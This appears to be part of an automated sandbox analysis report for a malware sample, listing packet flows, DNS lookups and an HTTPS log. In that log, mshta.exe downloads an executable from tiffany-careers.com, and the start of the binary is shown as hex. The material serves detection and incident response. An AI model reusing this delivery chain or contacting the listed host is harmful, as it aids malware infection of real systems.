Dec 28, 2024 09:35:45.070662022 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.070681095 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.070728064 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.070743084 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.070770979 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.070790052 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.076951981 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.076977968 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.077033997 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.077060938 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.077080011 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.077095985 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.084516048 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.084547043 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.084605932 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.084621906 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.084645987 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.084662914 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.090691090 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.090733051 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.090759039 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.090770960 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.090792894 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.090809107 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.097769022 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.097801924 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.097837925 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.097852945 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.097877979 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.097894907 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.245209932 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.245243073 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.245290041 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.245321989 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.245338917 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.245358944 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.257677078 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.257703066 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.257777929 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.257796049 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.257905960 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.264669895 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.264693975 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.264764071 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.264780045 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.264857054 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.271642923 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.271661997 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.271733046 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.271747112 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.271878004 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.277832985 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.277857065 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.277914047 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.277928114 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.278027058 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.285247087 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.285269022 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.285327911 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.285341024 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.285371065 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.285393000 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.291661978 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.291733027 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.291780949 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.291795015 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.291826963 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.291848898 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.298572063 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.298620939 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.298660994 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.298674107 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.298702955 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.298763037 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.446528912 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.446599960 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.446655035 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.446679115 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.446732044 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.459110022 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.459170103 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.459182024 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.459198952 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.459223032 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.459240913 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.466012955 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.466059923 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.466110945 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.466125965 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.466140985 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.466162920 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.473047018 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.473118067 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.473129988 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.473144054 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.473170042 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.473193884 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.479198933 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.479258060 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.479334116 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.479348898 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.479381084 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.479399920 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.486634016 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.486685038 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.486711025 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.486725092 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.486768007 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.492743015 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.492814064 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.492875099 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.492888927 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.492924929 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.492991924 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.499715090 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.499763966 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.499814034 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.499830008 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.499861956 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.499882936 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.648257971 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.648351908 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.648354053 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.648382902 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.648406982 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.648422956 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.660671949 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.660698891 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.660737038 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.660757065 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.660793066 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.660809040 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.667267084 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.667292118 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.667326927 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.667345047 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.667363882 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.667659044 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.673295021 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.673315048 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.673365116 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.673383951 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.673398972 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.673417091 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.680186033 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.680206060 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.680290937 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.680308104 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.680500984 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.686990023 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.687007904 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.687063932 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.687082052 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.687097073 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.687109947 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.693485975 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.693502903 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.693547010 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.693562984 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.693578959 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.693627119 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.700362921 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.700387001 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.700437069 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.700452089 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.700473070 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.700486898 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.849215031 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.849244118 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.849302053 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.849338055 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.849355936 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.849389076 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.861536980 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.861553907 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.861608982 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.861624002 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.861637115 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.861676931 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.868477106 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.868495941 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.868556976 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.868571043 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.868741989 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.871356010 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.871417046 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.871432066 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.871447086 CET	443	49728	147.45.49.155	192.168.2.9
Dec 28, 2024 09:35:45.871638060 CET	49728	443	192.168.2.9	147.45.49.155
Dec 28, 2024 09:35:45.871983051 CET	49728	443	192.168.2.9	147.45.49.155

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 09:35:18.771615982 CET	55027	53	192.168.2.9	1.1.1.1
Dec 28, 2024 09:35:18.994838953 CET	53	55027	1.1.1.1	192.168.2.9
Dec 28, 2024 09:35:37.523993015 CET	53109	53	192.168.2.9	1.1.1.1
Dec 28, 2024 09:35:48.704230070 CET	52395	53	192.168.2.9	1.1.1.1
Dec 28, 2024 09:35:48.929466009 CET	53	52395	1.1.1.1	192.168.2.9
Dec 28, 2024 09:36:04.679475069 CET	64780	53	192.168.2.9	1.1.1.1
Dec 28, 2024 09:36:04.822374105 CET	53	64780	1.1.1.1	192.168.2.9
Dec 28, 2024 09:36:09.069098949 CET	62114	53	192.168.2.9	1.1.1.1
Dec 28, 2024 09:36:09.213687897 CET	53	62114	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 28, 2024 09:35:18.771615982 CET	192.168.2.9	1.1.1.1	0x2446	Standard query (0)	tiffany-careers.com	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:35:37.523993015 CET	192.168.2.9	1.1.1.1	0xfcbb	Standard query (0)	x1.i.lencr.org	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:35:48.704230070 CET	192.168.2.9	1.1.1.1	0x9922	Standard query (0)	nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:36:04.679475069 CET	192.168.2.9	1.1.1.1	0xec14	Standard query (0)	nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:36:09.069098949 CET	192.168.2.9	1.1.1.1	0x5604	Standard query (0)	nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 28, 2024 09:35:18.994838953 CET	1.1.1.1	192.168.2.9	0x2446	No error (0)	tiffany-careers.com		147.45.49.155	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:35:37.664005041 CET	1.1.1.1	192.168.2.9	0xfcbb	No error (0)	x1.i.lencr.org	crl.root-x1.letsencrypt.org.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 28, 2024 09:35:39.543154955 CET	1.1.1.1	192.168.2.9	0x584e	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:35:39.543154955 CET	1.1.1.1	192.168.2.9	0x584e	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:35:48.929466009 CET	1.1.1.1	192.168.2.9	0x9922	Name error (3)	nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs	none	none	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:36:04.822374105 CET	1.1.1.1	192.168.2.9	0xec14	Name error (3)	nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs	none	none	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:36:09.213687897 CET	1.1.1.1	192.168.2.9	0x5604	Name error (3)	nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

tiffany-careers.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49707	147.45.49.155	443	7728	C:\Windows\System32\mshta.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-28 08:35:20 UTC	331	OUT	GET /Ghep2712 HTTP/1.1 Accept: / Accept-Language: en-CH UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: tiffany-careers.com Connection: Keep-Alive
2024-12-28 08:35:21 UTC	397	IN	HTTP/1.1 200 OK etag: "6bca9-676f09ca-23c48;;;" last-modified: Fri, 27 Dec 2024 20:10:50 GMT content-length: 441513 accept-ranges: bytes date: Sat, 28 Dec 2024 08:35:20 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46" connection: close
2024-12-28 08:35:21 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 1b 8a 28 f3 7a e4 7b f3 7a e4 7b f3 7a e4 7b e7 11 e7 7a f0 7a e4 7b e7 11 e0 7a e4 7a e4 7b e7 11 e1 7a f4 7a e4 7b e7 11 e5 7a ee 7a e4 7b f3 7a e5 7b da 7b e4 7b e7 11 ed 7a e0 7a e4 7b e7 11 1b 7b f2 7a e4 7b e7 11 e6 7a f2 7a e4 7b 52 69 63 68 f3 7a e4 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 b4 fd 18 da 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$(z{z{z{zz{zz{zz{zz{z{{{zz{{z{zz{Richz{PEL
2024-12-28 08:35:21 UTC	16384	IN	Data Raw: 33 d2 89 10 89 13 89 17 85 f6 0f 84 89 00 00 00 8d 41 02 89 45 fc 66 8b 01 83 c1 02 66 3b c2 75 f5 2b 4d fc d1 f9 74 71 83 f9 03 77 6c 6a 30 58 89 45 fc 85 c9 74 16 66 8b 04 56 66 2b 45 fc 66 83 f8 09 77 54 42 3b d1 72 ed 6a 30 58 83 f9 03 75 1d 8b 4d f8 0f b7 06 6a 30 5a 2b c2 89 01 0f b7 46 02 2b c2 89 03 0f b7 46 04 2b c2 eb 15 83 f9 02 75 14 0f b7 06 6a 30 59 2b c1 89 03 0f b7 46 02 2b c1 89 07 eb 0c 83 f9 01 75 07 0f b7 0e 2b c8 89 0f 33 c0 40 eb 02 33 c0 5f 5e 5b c9 c2 08 00 8b ff 55 8b ec 83 ec 14 53 56 57 85 c9 74 5c 83 65 fc 00 83 65 f4 00 6a 03 58 66 89 45 ec 8d 45 fc 50 68 e0 14 40 00 6a fc 51 ff 15 10 13 41 00 85 c0 75 37 8b 45 fc 85 c0 74 30 8b 18 8d 75 ec 83 ec 10 8b fc 8b 4b 54 6a 01 a5 50 a5 a5 a5 ff 15 4c 14 41 00 ff 53 54 8b 45 fc 50 8b Data Ascii: 3AEff;u+Mtqwlj0XEtfVf+EfwTB;rj0XuMj0Z+F+F+uj0Y+F+u+3@3_^[USVWt\eejXfEEPh@jQAu7Et0uKTjPLASTEP
2024-12-28 08:35:21 UTC	16384	IN	Data Raw: 5e eb 0b ff 72 f4 8b cb 52 e8 53 02 00 00 5f 8b c3 5b 5d c2 04 00 6a 08 b8 10 ed 40 00 e8 52 5b 00 00 8b f1 89 75 f0 68 78 02 41 00 e8 6f ba ff ff ff 75 08 83 65 fc 00 8b ce e8 1c 00 00 00 84 c0 75 0a ff 75 08 8b ce e8 57 ff ff ff 83 4d fc ff 8b c6 e8 ea 5a 00 00 c2 04 00 8b ff 55 8b ec 51 8b 45 08 32 d2 85 c0 74 12 a9 00 00 ff ff 75 0b 0f b7 c0 50 e8 52 c7 ff ff b2 01 8a c2 59 5d c2 04 00 6a 04 b8 44 ed 40 00 e8 e5 5a 00 00 8b d1 83 65 f0 00 8b 7d 0c 85 ff 79 02 33 ff 8b 75 10 85 f6 79 02 33 f6 b8 ff ff ff 7f 2b c7 3b c6 7c 67 8b 1a 8d 04 37 8b 4b f4 3b c1 7e 04 8b f1 2b f7 3b f9 7e 02 33 f6 85 ff 75 28 3b f1 75 24 8d 4b f0 e8 38 c8 ff ff 8b 4d 08 83 c0 10 89 01 21 7d fc c7 45 f0 01 00 00 00 8b c1 e8 51 5a 00 00 c2 0c 00 8b ca e8 bb c7 ff ff 8b 4d 08 50 Data Ascii: ^rRS_[]j@R[uhxAoueuuWMZUQE2tuPRY]jD@Ze}y3uy3+;\|g7K;~+;~3u(;u$K8M!}EQZMP
2024-12-28 08:35:21 UTC	16384	IN	Data Raw: fc 8d 41 28 57 8b 7d fc 89 45 fc 3b f8 74 3b 53 56 8b 1f 85 db 74 24 8b f3 8b 5b 04 8d 4e 08 e8 c0 e8 ff ff 56 6a 00 ff 15 f4 11 41 00 50 ff 15 dc 12 41 00 85 db 75 df 8b 45 fc c7 07 00 00 00 00 83 c7 04 3b f8 75 c9 5e 5b 5f c9 c3 8b ff 55 8b ec 56 57 8b 39 33 f6 56 6a ff 57 ff 15 30 12 41 00 b9 80 00 00 00 3d 02 01 00 00 74 08 85 c0 74 0c 3b c1 75 15 85 c0 74 04 3b c1 75 02 8b f7 8b 45 08 5f 89 30 5e 5d c2 10 00 51 8b 4d 04 e8 1e e4 ff ff cc 8b ff 55 8b ec 51 53 56 8b f1 8b da 33 c9 57 3b f3 74 45 8b 7d 08 85 ff 74 3e 66 39 0f 74 39 8b cf e8 47 df ff ff 2b de 89 45 fc 3b d8 73 0c 8b 45 0c 85 c0 74 2b 83 20 00 eb 26 50 57 53 56 ff 15 1c 14 41 00 8b 45 0c 83 c4 10 85 c0 74 02 89 30 8b 45 fc 03 c6 eb 0b 8b 45 0c 85 c0 74 02 89 08 8b c6 5f 5e 5b c9 c2 08 00 Data Ascii: A(W}E;t;SVt$[NVjAPAuE;u^[_UVW93VjW0A=tt;ut;uE_0^]QMUQSV3W;tE}t>f9t9G+E;sEt+ &PWSVAEt0EEt_^[
2024-12-28 08:35:21 UTC	16384	IN	Data Raw: ac 31 01 00 7c 31 01 00 42 31 01 00 16 31 01 00 ec 30 01 00 c0 30 01 00 8e 30 01 00 60 30 01 00 30 30 01 00 fe 2f 01 00 c0 2f 01 00 8e 2f 01 00 6c 2f 01 00 0e 2f 01 00 da 2e 01 00 b6 2e 01 00 90 2e 01 00 48 2e 01 00 f8 2d 01 00 a8 2d 01 00 5a 2d 01 00 26 2d 01 00 f0 2c 01 00 b0 2c 01 00 6a 2c 01 00 40 2c 01 00 1a 2c 01 00 ec 2b 01 00 c0 2b 01 00 78 2b 01 00 48 2b 01 00 20 2b 01 00 e6 2a 01 00 aa 2a 01 00 72 2a 01 00 2c 2a 01 00 fa 29 01 00 a6 29 01 00 7a 29 01 00 4c 29 01 00 1e 29 01 00 f4 28 01 00 b2 28 01 00 56 28 01 00 20 28 01 00 ca 27 01 00 7a 27 01 00 3c 27 01 00 06 27 01 00 d0 26 01 00 7e 26 01 00 4c 26 01 00 22 26 01 00 ee 25 01 00 a8 25 01 00 6a 25 01 00 32 25 01 00 e4 24 01 00 a8 24 01 00 74 24 01 00 3e 24 01 00 08 24 01 00 cc 23 01 00 8e 23 01 Data Ascii: 1\|1B11000`000///l//...H.--Z-&-,,j,@,,++x+H+ +*r,*))z)L))((V( ('z'<''&~&L&"&%%j%2%$$t$>$$##
2024-12-28 08:35:21 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 1b 8a 28 f3 7a e4 7b f3 7a e4 7b f3 7a e4 7b e7 11 e7 7a f0 7a e4 7b e7 11 e0 7a e4 7a e4 7b e7 11 e1 7a f4 7a e4 7b e7 11 e5 7a ee 7a e4 7b f3 7a e5 7b da 7b e4 7b e7 11 ed 7a e0 7a e4 7b e7 11 1b 7b f2 7a e4 7b e7 11 e6 7a f2 7a e4 7b 52 69 63 68 f3 7a e4 7b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 b4 fd 18 da 00 00 00 Data Ascii: MZ@!L!This 